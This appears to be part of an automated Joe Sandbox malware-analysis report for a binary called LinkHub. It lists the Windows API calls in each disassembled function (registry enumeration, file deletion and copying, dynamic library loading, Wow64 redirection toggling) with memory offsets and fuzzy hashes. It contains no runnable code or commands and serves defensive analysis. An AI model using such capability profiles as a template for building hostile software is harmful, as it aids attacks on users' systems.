                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                    • String ID: 0
                                                                    • API String ID: 3076010158-4108050209
                                                                    • Opcode ID: 9c2878d38a4049c572ccf3d6700430d5e797ba953ef96dd313ce67d62b24b4e1
                                                                    • Instruction ID: af7fead71e21baf458c62595392964b12b66fb7d0f6a2907c1b334bf7aa7f5c2
                                                                    • Opcode Fuzzy Hash: 9c2878d38a4049c572ccf3d6700430d5e797ba953ef96dd313ce67d62b24b4e1
                                                                    • Instruction Fuzzy Hash: BA416CB5A1124AEFDB10DF56E894EEA7BB9FF05324F44412AE94597350C330AD64CF60
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002A4620
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002A27B3
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002A27C6
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 002A27F6
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2081771294-1403004172
                                                                    • Opcode ID: d5f0c6c1c38c63dc3b85d1f2d8eb90709eed92f4c3f96c29276a3be7b31b23d2
                                                                    • Instruction ID: 95e75c5dc3a1d7e38acb52490e60f69fca0167ff4e55d6d446585b60d0b6a158
                                                                    • Opcode Fuzzy Hash: d5f0c6c1c38c63dc3b85d1f2d8eb90709eed92f4c3f96c29276a3be7b31b23d2
                                                                    • Instruction Fuzzy Hash: C121F671D60104BFDB09AB64DC46CFEBB78DF46360F50412AF421971E1CF785D299A60
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002D3A29
                                                                    • LoadLibraryW.KERNEL32(?), ref: 002D3A30
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002D3A45
                                                                    • DestroyWindow.USER32(?), ref: 002D3A4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 3529120543-1011021900
                                                                    • Opcode ID: d72a893d8ac6d8e6abc21fff4644ed8a6330a0f9083565e27caedbefa845cc2d
                                                                    • Instruction ID: 593451251aa216772164decdbb14862a34c797991951c4899c977c3f8446b2f6
                                                                    • Opcode Fuzzy Hash: d72a893d8ac6d8e6abc21fff4644ed8a6330a0f9083565e27caedbefa845cc2d
                                                                    • Instruction Fuzzy Hash: 8221A172620206ABEB10CF64EC94FBB77ADEB44364F105616FA91922D0C771DD609B62
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • GetCursorPos.USER32(?), ref: 002D9A5D
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002D9A72
                                                                    • GetCursorPos.USER32(?), ref: 002D9ABA
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 002D9AF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID: (1
                                                                    • API String ID: 2864067406-3903994380
                                                                    • Opcode ID: a7dc65df0fc89a136f858576b0330389cbf401ad1afb58d58f3b9006ced6a94d
                                                                    • Instruction ID: c4734555b3f08d6bd9b32ceb83b559de85be5c7b2d6d013121bd51a1fd04a6aa
                                                                    • Opcode Fuzzy Hash: a7dc65df0fc89a136f858576b0330389cbf401ad1afb58d58f3b9006ced6a94d
                                                                    • Instruction Fuzzy Hash: 4C21BF36610018EFCF269F98D858EEA7BB9EB09310F404156F9054B2A1D7719DB0DBA0
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00241AF4
                                                                    • GetClientRect.USER32(?,?), ref: 002831F9
                                                                    • GetCursorPos.USER32(?), ref: 00283203
                                                                    • ScreenToClient.USER32(?,?), ref: 0028320E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID: (1
                                                                    • API String ID: 4127811313-3903994380
                                                                    • Opcode ID: e2bcd204ddb20e8a81fb7d4e5f6785658224a0870798ba779563983c517d618b
                                                                    • Instruction ID: af124ee79aab60985177eb0d22f28bd2d54dadf4dfa7bc5df38b6483bc91f83d
                                                                    • Opcode Fuzzy Hash: e2bcd204ddb20e8a81fb7d4e5f6785658224a0870798ba779563983c517d618b
                                                                    • Instruction Fuzzy Hash: 73116A35A1212AEBCB04EFA8D9898EE77B8EB04740F000452E902E3140C770BAA1CBA1
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0026508E,00000003,?,0026502E,00000003,003098D8,0000000C,00265185,00000003,00000002), ref: 002650FD
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00265110
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0026508E,00000003,?,0026502E,00000003,003098D8,0000000C,00265185,00000003,00000002,00000000), ref: 00265133
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: a194b697f342d9e18218a0bb67eca012c230342816f1bc677486666265eb5ebf
                                                                    • Instruction ID: aeb93cc80e7f99f6c3b8f8ce9815248870272a640c0901247c45942340b3194b
                                                                    • Opcode Fuzzy Hash: a194b697f342d9e18218a0bb67eca012c230342816f1bc677486666265eb5ebf
                                                                    • Instruction Fuzzy Hash: 13F0C830951618BBDB115F94DC4DB9DBFB8EF04712F0000A5F809A2160CB309DE0DA90
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0024668B,?,?,002462FA,?,00000001,?,?,00000000), ref: 0024664A
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0024665C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,0024668B,?,?,002462FA,?,00000001,?,?,00000000), ref: 0024666E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 145871493-3689287502
                                                                    • Opcode ID: 509fbfbb531023fa2e7f61f9620ae077522e1fd555370388d2ff8acbfe0d64a0
                                                                    • Instruction ID: 21bf5ea818a6020a3f764c10801aab1daaca552c8c32a36090a5e346d57fa426
                                                                    • Opcode Fuzzy Hash: 509fbfbb531023fa2e7f61f9620ae077522e1fd555370388d2ff8acbfe0d64a0
                                                                    • Instruction Fuzzy Hash: 40E0E635A17E235793261F25BC0CA5A666CDF93F16B060116FD04E2254DB54CD1185A5
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00285657,?,?,002462FA,?,00000001,?,?,00000000), ref: 00246610
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00246622
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00285657,?,?,002462FA,?,00000001,?,?,00000000), ref: 00246635
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 145871493-1355242751
                                                                    • Opcode ID: 930f69f53d773fc36e813f2ea497ff616d3ca2910e2ddecb1d39634b7e551fcd
                                                                    • Instruction ID: 7dc4fae84d566bc44f798abfc8e42232ac18a355a4514caa2f0f796729bd6043
                                                                    • Opcode Fuzzy Hash: 930f69f53d773fc36e813f2ea497ff616d3ca2910e2ddecb1d39634b7e551fcd
                                                                    • Instruction Fuzzy Hash: 3BD01235A23D335743362B257C1C98E6B1CDE93B1130A0016F914A2154CFA4CD5185A9
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B35C4
                                                                    • DeleteFileW.KERNEL32(?), ref: 002B3646
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002B365C
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B366D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B367F
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$Copy
                                                                    • String ID:
                                                                    • API String ID: 3226157194-0
                                                                    • Opcode ID: 02e62738f0d27a5198e1684d9c79845f6e4a839b5a203cf74dd6ab66148dce93
                                                                    • Instruction ID: ace3843b7066c6e0dccaff93daefcb3ffc900854eac63030fd5ad1f03fc81bc4
                                                                    • Opcode Fuzzy Hash: 02e62738f0d27a5198e1684d9c79845f6e4a839b5a203cf74dd6ab66148dce93
                                                                    • Instruction Fuzzy Hash: D6B15E72E11119ABDF15DFA4CC89EDEBBBDEF49350F0040A6F609A7141EA309B948F61
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 002CAE87
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002CAE95
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002CAEC8
                                                                    • CloseHandle.KERNEL32(?), ref: 002CB09D
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 3488606520-0
                                                                    • Opcode ID: c82e6c2469029374d8120aa3b36260f047b0c0abf24233c37d65999ad6f2de44
                                                                    • Instruction ID: cd617ae06b67485a379b01ff8fe80246a437a401ed550aae8c2dfa10163d93e5
                                                                    • Opcode Fuzzy Hash: c82e6c2469029374d8120aa3b36260f047b0c0abf24233c37d65999ad6f2de44
                                                                    • Instruction Fuzzy Hash: E6A1B071A14301AFE724DF28C886F2AB7E5AF44714F14895DF9999B2D2CB71EC50CB82
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CC10E,?,?), ref: 002CD415
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD451
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD4C8
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002CC505
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002CC560
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002CC5C3
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 002CC606
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002CC613
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 826366716-0
                                                                    • Opcode ID: c6b73873f1c9ca70ece2edc3a7ab790e04d4d7d56b9900c048f396be8772279c
                                                                    • Instruction ID: a3f216df2ab11749923158aae5a7471606c4be0f68343ad5ced89c418144dbf7
                                                                    • Opcode Fuzzy Hash: c6b73873f1c9ca70ece2edc3a7ab790e04d4d7d56b9900c048f396be8772279c
                                                                    • Instruction Fuzzy Hash: 9A618D31628241AFC318DF14C894F2ABBE5BF84348F64859DF0599B292CB31ED56CF91
                                                                    APIs
                                                                      • Part of subcall function 002AE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002AD7CD,?), ref: 002AE714
                                                                      • Part of subcall function 002AE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002AD7CD,?), ref: 002AE72D
                                                                      • Part of subcall function 002AEAB0: GetFileAttributesW.KERNEL32(?,002AD840), ref: 002AEAB1
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 002AED8A
                                                                    • MoveFileW.KERNEL32(?,?), ref: 002AEDC3
                                                                    • _wcslen.LIBCMT ref: 002AEF02
                                                                    • _wcslen.LIBCMT ref: 002AEF1A
                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 002AEF67
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3183298772-0
                                                                    • Opcode ID: a3a4e4efae406b47ffac1a3c38b8ac36dfd73be2289c262bcd7caf143f41d796
                                                                    • Instruction ID: bf97e7cc6640a1a59b461178cf26f9fde3dafb59b5e24b6a67715f42a1fd69d9
                                                                    • Opcode Fuzzy Hash: a3a4e4efae406b47ffac1a3c38b8ac36dfd73be2289c262bcd7caf143f41d796
                                                                    • Instruction Fuzzy Hash: 445160B25187859BCB24EB90D8859DFB3ECEF86310F00092EF685C3151EF31A6998B56
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 002A9534
                                                                    • VariantClear.OLEAUT32 ref: 002A95A5
                                                                    • VariantClear.OLEAUT32 ref: 002A9604
                                                                    • VariantClear.OLEAUT32(?), ref: 002A9677
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002A96A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                    • String ID:
                                                                    • API String ID: 4136290138-0
                                                                    • Opcode ID: 6ad625e6b040967282ed79967862daf903bc1af3c5c351b6635dfd2439f3485a
                                                                    • Instruction ID: 4039a35683f843f2f3fb6ddafc61203ee375dd8ab4023426622005b878702516
                                                                    • Opcode Fuzzy Hash: 6ad625e6b040967282ed79967862daf903bc1af3c5c351b6635dfd2439f3485a
                                                                    • Instruction Fuzzy Hash: F9516AB5A10619EFCB10CF59C884EAAB7F8FF89710B058559E909DB310EB30E961CF90
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002B95F3
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 002B961F
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002B9677
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002B969C
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002B96A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                    • String ID:
                                                                    • API String ID: 2832842796-0
                                                                    • Opcode ID: d7df146f1674b24cad2cc78251cb2e705ad9a92b5e5e8a4f4992bc5a16bb487e
                                                                    • Instruction ID: a8bf88479bbe4247fdd349d748f6b4e4d436e94e44d2ac07024fcbf21e00c1c3
                                                                    • Opcode Fuzzy Hash: d7df146f1674b24cad2cc78251cb2e705ad9a92b5e5e8a4f4992bc5a16bb487e
                                                                    • Instruction Fuzzy Hash: 54513B35A102199FCB05DF64C885AAEBBF5FF49354F048098E949AB362CB35ED51CF90
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 002C999D
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 002C9A2D
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 002C9A49
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 002C9A8F
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 002C9AAF
                                                                      • Part of subcall function 0025F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,002B1A02,?,7529E610), ref: 0025F9F1
                                                                      • Part of subcall function 0025F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,002A0354,00000000,00000000,?,?,002B1A02,?,7529E610,?,002A0354), ref: 0025FA18
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                    • String ID:
                                                                    • API String ID: 666041331-0
                                                                    • Opcode ID: 471525caf8efccac4137469f29c63d021872ef26e2a3127ec38b3f54bf852d0a
                                                                    • Instruction ID: 3c1e238524ac905bd78127d37674485146740103093520a70c6e2dba2aa970f7
                                                                    • Opcode Fuzzy Hash: 471525caf8efccac4137469f29c63d021872ef26e2a3127ec38b3f54bf852d0a
                                                                    • Instruction Fuzzy Hash: E5516C35A15646DFCB05DF68C488DADBBB0FF09314B1481A9E80A9B322D731ED96CF90
                                                                    APIs
                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 002D766B
                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 002D7682
                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002D76AB
                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,002BB5BE,00000000,00000000), ref: 002D76D0
